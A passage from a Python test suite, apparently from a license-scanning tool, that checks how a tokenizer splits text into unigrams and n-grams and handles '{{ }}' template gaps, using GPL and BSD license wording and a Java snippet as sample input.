Token(start_line=10, end_line=10, start_char=1, end_char=5, value=u'sein', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=6, end_char=10, value=u'wird', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=12, end_char=16, value=u'aber', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=17, end_char=21, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=22, end_char=32, value=u'irgendeine', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=33, end_char=41, value=u'garantie', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=43, end_char=48, value=u'sogar', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=49, end_char=53, value=u'ohne', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=54, end_char=57, value=u'die', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=58, end_char=67, value=u'implizite', gap=NO_GAP),
Token(start_line=10, end_line=10, start_char=68, end_char=76, value=u'garantie', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=5, end_char=15, value=u'marktreife', gap=NO_GAP),
Token(start_line=11, end_line=11, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=1, end_char=5, value=u'oder', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=6, end_char=9, value=u'der', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=10, end_char=24, value=u'verwendbarkeit', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=25, end_char=28, value=u'f\xfcr', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=29, end_char=34, value=u'einen', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=35, end_char=45, value=u'bestimmten', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=46, end_char=51, value=u'zweck', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=53, end_char=60, value=u'details', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=61, end_char=67, value=u'finden', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=68, end_char=71, value=u'sie', gap=NO_GAP),
Token(start_line=12, end_line=12, start_char=72, end_char=74, value=u'in', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=1, end_char=4, value=u'der', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=5, end_char=8, value=u'gnu', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=9, end_char=16, value=u'general', gap=NO_GAP),
Token(start_line=13, end_line=13, start_char=18, end_char=19, value=u'n', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=1, end_char=7, value=u'public', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=8, end_char=15, value=u'license', gap=NO_GAP),
Token(start_line=14, end_line=14, start_char=17, end_char=18, value=u'n', gap=NO_GAP),
Token(start_line=15, end_line=15, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=1, end_char=4, value=u'sie', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=5, end_char=12, value=u'sollten', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=13, end_char=16, value=u'ein', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=17, end_char=25, value=u'exemplar', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=26, end_char=29, value=u'der', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=30, end_char=33, value=u'gnu', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=34, end_char=41, value=u'general', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=42, end_char=48, value=u'public', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=49, end_char=56, value=u'license', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=57, end_char=65, value=u'zusammen', gap=NO_GAP),
Token(start_line=16, end_line=16, start_char=66, end_char=69, value=u'mit', gap=DEFAULT_GAP),
Token(start_line=17, end_line=17, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=1, end_char=9, value=u'erhalten', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=10, end_char=15, value=u'haben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=17, end_char=22, value=u'falls', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=23, end_char=28, value=u'nicht', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=30, end_char=39, value=u'schreiben', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=40, end_char=43, value=u'sie', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=44, end_char=46, value=u'an', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=47, end_char=50, value=u'die', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=51, end_char=55, value=u'free', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=56, end_char=64, value=u'software', gap=NO_GAP),
Token(start_line=18, end_line=18, start_char=65, end_char=75, value=u'foundation', gap=NO_GAP),
Token(start_line=19, end_line=19, start_char=2, end_char=3, value=u'n', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=1, end_char=4, value=u'inc', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=7, end_char=9, value=u'51', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=10, end_char=18, value=u'franklin', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=19, end_char=21, value=u'st', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=23, end_char=28, value=u'fifth', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=29, end_char=34, value=u'floor', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=36, end_char=42, value=u'boston', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=44, end_char=46, value=u'ma', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=47, end_char=52, value=u'02110', gap=NO_GAP),
Token(start_line=20, end_line=20, start_char=54, end_char=57, value=u'usa', gap=NO_GAP),
]
test_file = self.get_test_loc('analysis/unicode/12180.txt')
with codecs.open(test_file, encoding='utf-8') as test:
result = list(self.template_parsing(test))
assert expected == result
def test_process_template_does_not_crash_on_unicode_rules_text_1(self):
test_file = self.get_test_loc('analysis/unicode/12290.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_2(self):
test_file = self.get_test_loc('analysis/unicode/12319.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_3(self):
test_file = self.get_test_loc('analysis/unicode/12405.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_4(self):
test_file = self.get_test_loc('analysis/unicode/12407.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_does_not_crash_on_unicode_rules_text_5(self):
test_file = self.get_test_loc('analysis/unicode/12420.txt')
with codecs.open(test_file, encoding='utf-8') as test:
list(self.template_parsing(test))
def test_process_template_detects_non_well_formed_templatized_regions(self):
lines = u'abcd{{ef'
self.assertRaises(UnbalancedTemplateError, self.template_parsing, lines)
def test_process_template_handles_combination_of_well_formed_and_ill_formed_templates_2(self):
lines = u'}}{{{{abc}}ddd}}{{'
self.assertRaises(UnbalancedTemplateError, self.template_parsing, lines)
def test_process_template_can_parse_ill_formed_template(self):
tf = self.get_test_loc('analysis/ill_formed_template/text.txt')
lines = unicode_text_lines(tf)
result = list(self.template_parsing(lines))
expected_gaps = [30, 10, 60, 70, 20]
result_gaps = [x.gap for x in result if x.gap]
assert expected_gaps == result_gaps
et = self.get_test_loc('analysis/ill_formed_template/expected_grams.json')
result_dicts = [t._asdict() for t in result]
regen = False
if regen:
with codecs.open(et, 'w', encoding='utf-8') as out:
json.dump(result_dicts, out, indent=2)
with codecs.open(et, encoding='utf-8') as inp:
expected = json.load(inp)
assert expected == result_dicts
def test_token_positions_are_kept_same_for_unigrams_and_ngrams_with_template(self):
lines = u'some text is some text {{ }} in all cases\n \n'
unigrams = unigram_tokenizer(iter([lines]), template=False)
tunigrams = unigram_tokenizer(iter([lines]), template=True)
ngrams = ngram_tokenizer(iter([lines]), ngram_len=3, template=False)
tngrams = ngram_tokenizer(iter([lines]), ngram_len=3, template=True)
expected_start_end = (0, 7,)
def check_start_end(l):
l = list(l)
result = (l[0].start, l[-1].end,)
assert expected_start_end == result
check_start_end(unigrams)
check_start_end(tunigrams)
check_start_end(ngrams)
check_start_end(tngrams)
def test_plain_unigrams_from_templated_unigrams(self):
lines = [u'My old tailor {{3 John Doe}} is quite very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
result = list(template_processor(unigrams))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=0, value=u'my'),
Token(start=0, start_line=0, start_char=3, end_line=0, end_char=6, end=0, gap=0, value=u'old'),
Token(start=0, start_line=0, start_char=7, end_line=0, end_char=13, end=0, gap=3, value=u'tailor'),
Token(start=0, start_line=0, start_char=29, end_line=0, end_char=31, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=32, end_line=0, end_char=37, end=0, gap=0, value=u'quite'),
Token(start=0, start_line=0, start_char=38, end_line=0, end_char=42, end=0, gap=0, value=u'very'),
Token(start=0, start_line=0, start_char=43, end_line=0, end_char=47, end=0, gap=0, value=u'rich'),
]
assert expected == result
class TestLegacyNgrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_plain_ngrams_processor(self):
from collections import deque
def ngram_processor(items, ngram_len):
ngram = deque()
current_len = 0
for item in items:
if current_len == ngram_len:
yield tuple(ngram)
ngram.popleft()
current_len -= 1
ngram.append(item)
current_len += 1
yield tuple(ngram)
text = (
u'''/*COMMENT
COMMENT COMMENT
- COMMENT
*/
public static boolean activateSearchResultView() {
String defaultPerspectiveId= SearchUI.getDefaultPerspectiveId();
if (defaultPerspectiveId != null) {
IWorkbenchWindow window= SearchPlugin.getActiveWorkbenchWindow();
if (window != null && window.getShell() != null && !window.getShell().isDisposed()) {
try {
PlatformUI.getWorkbench().showPerspective(defaultPerspectiveId, window);
} catch (WorkbenchException ex) {
// show view in current perspective
}
}
}''')
expected = [
(u'comment', u'comment', u'comment', u'comment', u'public', u'static'),
(u'comment', u'comment', u'comment', u'public', u'static', u'boolean'),
(u'comment', u'comment', u'public', u'static', u'boolean',
u'activatesearchresultview'),
(u'comment', u'public', u'static', u'boolean',
u'activatesearchresultview', u'string'),
(u'public', u'static', u'boolean', u'activatesearchresultview',
u'string', u'defaultperspectiveid'),
(u'static', u'boolean', u'activatesearchresultview', u'string',
u'defaultperspectiveid', u'searchui'),
(u'boolean', u'activatesearchresultview', u'string',
u'defaultperspectiveid', u'searchui', u'getdefaultperspectiveid'),
(u'activatesearchresultview', u'string', u'defaultperspectiveid',
u'searchui', u'getdefaultperspectiveid', u'if'),
(u'string', u'defaultperspectiveid', u'searchui',
u'getdefaultperspectiveid', u'if', u'defaultperspectiveid'),
(u'defaultperspectiveid', u'searchui', u'getdefaultperspectiveid',
u'if', u'defaultperspectiveid', u'null'),
(u'searchui', u'getdefaultperspectiveid', u'if',
u'defaultperspectiveid', u'null', u'iworkbenchwindow'),
(u'getdefaultperspectiveid', u'if', u'defaultperspectiveid', u'null',
u'iworkbenchwindow', u'window'),
(u'if', u'defaultperspectiveid', u'null', u'iworkbenchwindow',
u'window', u'searchplugin'),
(u'defaultperspectiveid', u'null', u'iworkbenchwindow', u'window',
u'searchplugin', u'getactiveworkbenchwindow'),
(u'null', u'iworkbenchwindow', u'window', u'searchplugin',
u'getactiveworkbenchwindow', u'if'),
(u'iworkbenchwindow', u'window', u'searchplugin',
u'getactiveworkbenchwindow', u'if', u'window'),
(u'window', u'searchplugin', u'getactiveworkbenchwindow', u'if',
u'window', u'null'),
(u'searchplugin', u'getactiveworkbenchwindow', u'if', u'window',
u'null', u'window'),
(u'getactiveworkbenchwindow', u'if', u'window', u'null', u'window',
u'getshell'),
(u'if', u'window', u'null', u'window', u'getshell', u'null'),
(u'window', u'null', u'window', u'getshell', u'null', u'window'),
(u'null', u'window', u'getshell', u'null', u'window', u'getshell'),
(u'window', u'getshell', u'null', u'window', u'getshell', u'isdisposed'),
(u'getshell', u'null', u'window', u'getshell', u'isdisposed', u'try'),
(u'null', u'window', u'getshell', u'isdisposed', u'try', u'platformui'),
(u'window', u'getshell', u'isdisposed', u'try', u'platformui',
u'getworkbench'),
(u'getshell', u'isdisposed', u'try', u'platformui', u'getworkbench',
u'showperspective'),
(u'isdisposed', u'try', u'platformui', u'getworkbench',
u'showperspective', u'defaultperspectiveid'),
(u'try', u'platformui', u'getworkbench', u'showperspective',
u'defaultperspectiveid', u'window'),
(u'platformui', u'getworkbench', u'showperspective',
u'defaultperspectiveid', u'window', u'catch'),
(u'getworkbench', u'showperspective', u'defaultperspectiveid',
u'window', u'catch', u'workbenchexception'),
(u'showperspective', u'defaultperspectiveid', u'window', u'catch',
u'workbenchexception', u'ex'),
(u'defaultperspectiveid', u'window', u'catch', u'workbenchexception',
u'ex', u'show'),
(u'window', u'catch', u'workbenchexception', u'ex', u'show', u'view'),
(u'catch', u'workbenchexception', u'ex', u'show', u'view', u'in'),
(u'workbenchexception', u'ex', u'show', u'view', u'in', u'current'),
(u'ex', u'show', u'view', u'in', u'current', u'perspective'),
]
unigrams = (x.value for x
in unigram_splitter(text.splitlines()))
result = list(ngram_processor(unigrams, ngram_len=6))
assert expected == result
class TestNgrams(FileBasedTesting):
test_data_dir = os.path.join(os.path.dirname(__file__), 'data')
def test_tokens_ngram_processor_bigrams_from_unigrams(self):
text = u'this is some text \n on multiple lines'
unigrams = unigram_splitter(text.splitlines())
result = list(tokens_ngram_processor(unigrams, ngram_len=2))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some')),
(Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text')),
(Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on')),
(Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple')),
(Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple'),
Token(start_line=1, start_char=13, end_line=1, end_char=18, value=u'lines'))
]
assert expected == result
def test_tokens_ngram_processor_n2_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=2))
assert expected == result
def test_tokens_ngram_processor_n3_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=3))
assert expected == result
def test_tokens_ngram_processor_n4_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=4))
assert expected == result
def test_tokens_ngram_processor_n10_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is')),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=10))
assert expected == result
def test_tokens_ngram_processor_n1_with_2_tokens(self):
text = u'this is'
unigrams = list(unigram_splitter(text.splitlines()))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),),
]
result = list(tokens_ngram_processor(iter(unigrams), ngram_len=1))
assert expected == result
def test_tokens_ngram_processor_3grams_from_unigrams_on_multilines(self):
text = u'this is some text \n on multiple lines'
unigrams = unigram_splitter(text.splitlines())
result = list(tokens_ngram_processor(unigrams, ngram_len=3))
expected = [
(Token(start_line=0, start_char=0, end_line=0, end_char=4, value=u'this'),
Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some')),
(Token(start_line=0, start_char=5, end_line=0, end_char=7, value=u'is'),
Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text')),
(Token(start_line=0, start_char=8, end_line=0, end_char=12, value=u'some'),
Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on')),
(Token(start_line=0, start_char=13, end_line=0, end_char=17, value=u'text'),
Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple')),
(Token(start_line=1, start_char=1, end_line=1, end_char=3, value=u'on'),
Token(start_line=1, start_char=4, end_line=1, end_char=12, value=u'multiple'),
Token(start_line=1, start_char=13, end_line=1, end_char=18, value=u'lines'))
]
assert expected == result
def test_tokens_ngram_processor_with_template_gaps_basic(self):
lines = [u'My old {{3 John Doe}} is rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=3))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=0, value=u'my'),
Token(start=0, start_line=0, start_char=3, end_line=0, end_char=6, end=0, gap=3, value=u'old'),
),
(Token(start=0, start_line=0, start_char=22, end_line=0, end_char=24, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=25, end_line=0, end_char=29, end=0, gap=0, value=u'rich'),
)
]
assert expected == result
def test_tokens_ngram_processor_with_template_gaps_merged(self):
lines = [u'My old tailor {{3 John Doe}} is quite very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start_line=0, start_char=0, end_line=0, end_char=13, gap=ngram_len, value=(u'my', u'old', u'tailor')),
Token(start_line=0, start_char=29, end_line=0, end_char=42, gap=0, value=(u'is', u'quite', u'very')),
Token(start_line=0, start_char=32, end_line=0, end_char=47, gap=0, value=(u'quite', u'very', u'rich')),
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_short_grams(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }} very rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite')),
Token(start=0, start_line=0, start_char=48, end_line=0, end_char=57, end=0, gap=0, value=(u'very', u'rich'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_short_and_long_grams(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }} very rich really rich']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite')),
Token(start=0, start_line=0, start_char=48, end_line=0, end_char=64, end=0, gap=0, value=(u'very', u'rich', u'really')),
Token(start=0, start_line=0, start_char=53, end_line=0, end_char=69, end=0, gap=0, value=(u'rich', u'really', u'rich'))
]
assert expected == result
def test_ngram_to_token_processor_with_gaps_at_the_end(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }}']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
ngrams_tuples = tokens_ngram_processor(templated, ngram_len=ngram_len)
result = list(ngram_to_token(ngrams_tuples))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=(u'my',)),
Token(start=0, start_line=0, start_char=20, end_line=0, end_char=28, end=0, gap=5, value=(u'is', u'quite'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_at_the_end_does_yield_empty_tuples(self):
lines = [u'My {{3 tailor Joe}} is quite {{ pleasant and }}']
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
ngram_len = 3
result = list(tokens_ngram_processor(templated, ngram_len=ngram_len))
assert (None, None, None,) != result[-1]
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=2, end=0, gap=3, value=u'my'),),
(Token(start=0, start_line=0, start_char=20, end_line=0, end_char=22, end=0, gap=0, value=u'is'),
Token(start=0, start_line=0, start_char=23, end_line=0, end_char=28, end=0, gap=5, value=u'quite'),
)
]
assert expected == result
def test_ngrams_tokenizer_does_not_yield_4grams_for_3grams(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the names {{}}of its contributors may
materials provided with the distribution.'''.splitlines()
result = list(ngram_tokenizer(iter(lines), ngram_len=3, template=True))
expected = [
Token(start=0, start_line=0, start_char=0, end_line=0, end_char=16, end=2, gap=0, value=(u'neither', u'the', u'name')),
Token(start=1, start_line=0, start_char=8, end_line=0, end_char=19, end=3, gap=10, value=(u'the', u'name', u'of')),
Token(start=4, start_line=0, start_char=44, end_line=0, end_char=47, end=4, gap=5, value=(u'nor',)),
Token(start=5, start_line=0, start_char=52, end_line=0, end_char=61, end=6, gap=5, value=(u'the', u'names')),
Token(start=7, start_line=0, start_char=66, end_line=0, end_char=85, end=9, gap=0, value=(u'of', u'its', u'contributors')),
Token(start=8, start_line=0, start_char=69, end_line=0, end_char=89, end=10, gap=0, value=(u'its', u'contributors', u'may')),
Token(start=9, start_line=0, start_char=73, end_line=1, end_char=25, end=11, gap=0, value=(u'contributors', u'may', u'materials')),
Token(start=10, start_line=0, start_char=86, end_line=1, end_char=34, end=12, gap=0, value=(u'may', u'materials', u'provided')),
Token(start=11, start_line=1, start_char=16, end_line=1, end_char=39, end=13, gap=0, value=(u'materials', u'provided', u'with')),
Token(start=12, start_line=1, start_char=26, end_line=1, end_char=43, end=14, gap=0, value=(u'provided', u'with', u'the')),
Token(start=13, start_line=1, start_char=35, end_line=1, end_char=56, end=15, gap=0, value=(u'with', u'the', u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_always_returns_3grams_when_requested(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the
names {{}}of its contributors may materials provided with
the distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=3))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name')),
(Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=0, start_char=52, end_line=0, end_char=55, end=0, gap=0, value=u'the'),
Token(start=0, start_line=1, start_char=19, end_line=1, end_char=24, end=0, gap=5, value=u'names')),
(Token(start=0, start_line=1, start_char=29, end_line=1, end_char=31, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided')),
(Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the')),
(Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the'),
Token(start=0, start_line=2, start_char=23, end_line=2, end_char=35, end=0, gap=0, value=u'distribution'))
]
assert expected == result
def test_tokens_ngram_processor_with_gaps_merged_always_returns_4grams_when_requested(self):
lines = u'''Neither the name of {{10 the ORGANIZATION}} nor {{}}the
names {{}}of its contributors may materials provided with
the distribution.'''.splitlines()
unigrams = unigram_splitter(lines, splitter=template_splitter)
templated = template_processor(unigrams)
result = list(tokens_ngram_processor(templated, ngram_len=4))
expected = [
(Token(start=0, start_line=0, start_char=0, end_line=0, end_char=7, end=0, gap=0, value=u'neither'),
Token(start=0, start_line=0, start_char=8, end_line=0, end_char=11, end=0, gap=0, value=u'the'),
Token(start=0, start_line=0, start_char=12, end_line=0, end_char=16, end=0, gap=0, value=u'name'),
Token(start=0, start_line=0, start_char=17, end_line=0, end_char=19, end=0, gap=10, value=u'of')),
(Token(start=0, start_line=0, start_char=44, end_line=0, end_char=47, end=0, gap=5, value=u'nor'),),
(Token(start=0, start_line=0, start_char=52, end_line=0, end_char=55, end=0, gap=0, value=u'the'),
Token(start=0, start_line=1, start_char=19, end_line=1, end_char=24, end=0, gap=5, value=u'names')),
(Token(start=0, start_line=1, start_char=29, end_line=1, end_char=31, end=0, gap=0, value=u'of'),
Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may')),
(Token(start=0, start_line=1, start_char=32, end_line=1, end_char=35, end=0, gap=0, value=u'its'),
Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials')),
(Token(start=0, start_line=1, start_char=36, end_line=1, end_char=48, end=0, gap=0, value=u'contributors'),
Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided')),
(Token(start=0, start_line=1, start_char=49, end_line=1, end_char=52, end=0, gap=0, value=u'may'),
Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with')),
(Token(start=0, start_line=1, start_char=53, end_line=1, end_char=62, end=0, gap=0, value=u'materials'),
Token(start=0, start_line=1, start_char=63, end_line=1, end_char=71, end=0, gap=0, value=u'provided'),
Token(start=0, start_line=1, start_char=72, end_line=1, end_char=76, end=0, gap=0, value=u'with'),
Token(start=0, start_line=2, start_char=19, end_line=2, end_char=22, end=0, gap=0, value=u'the')),
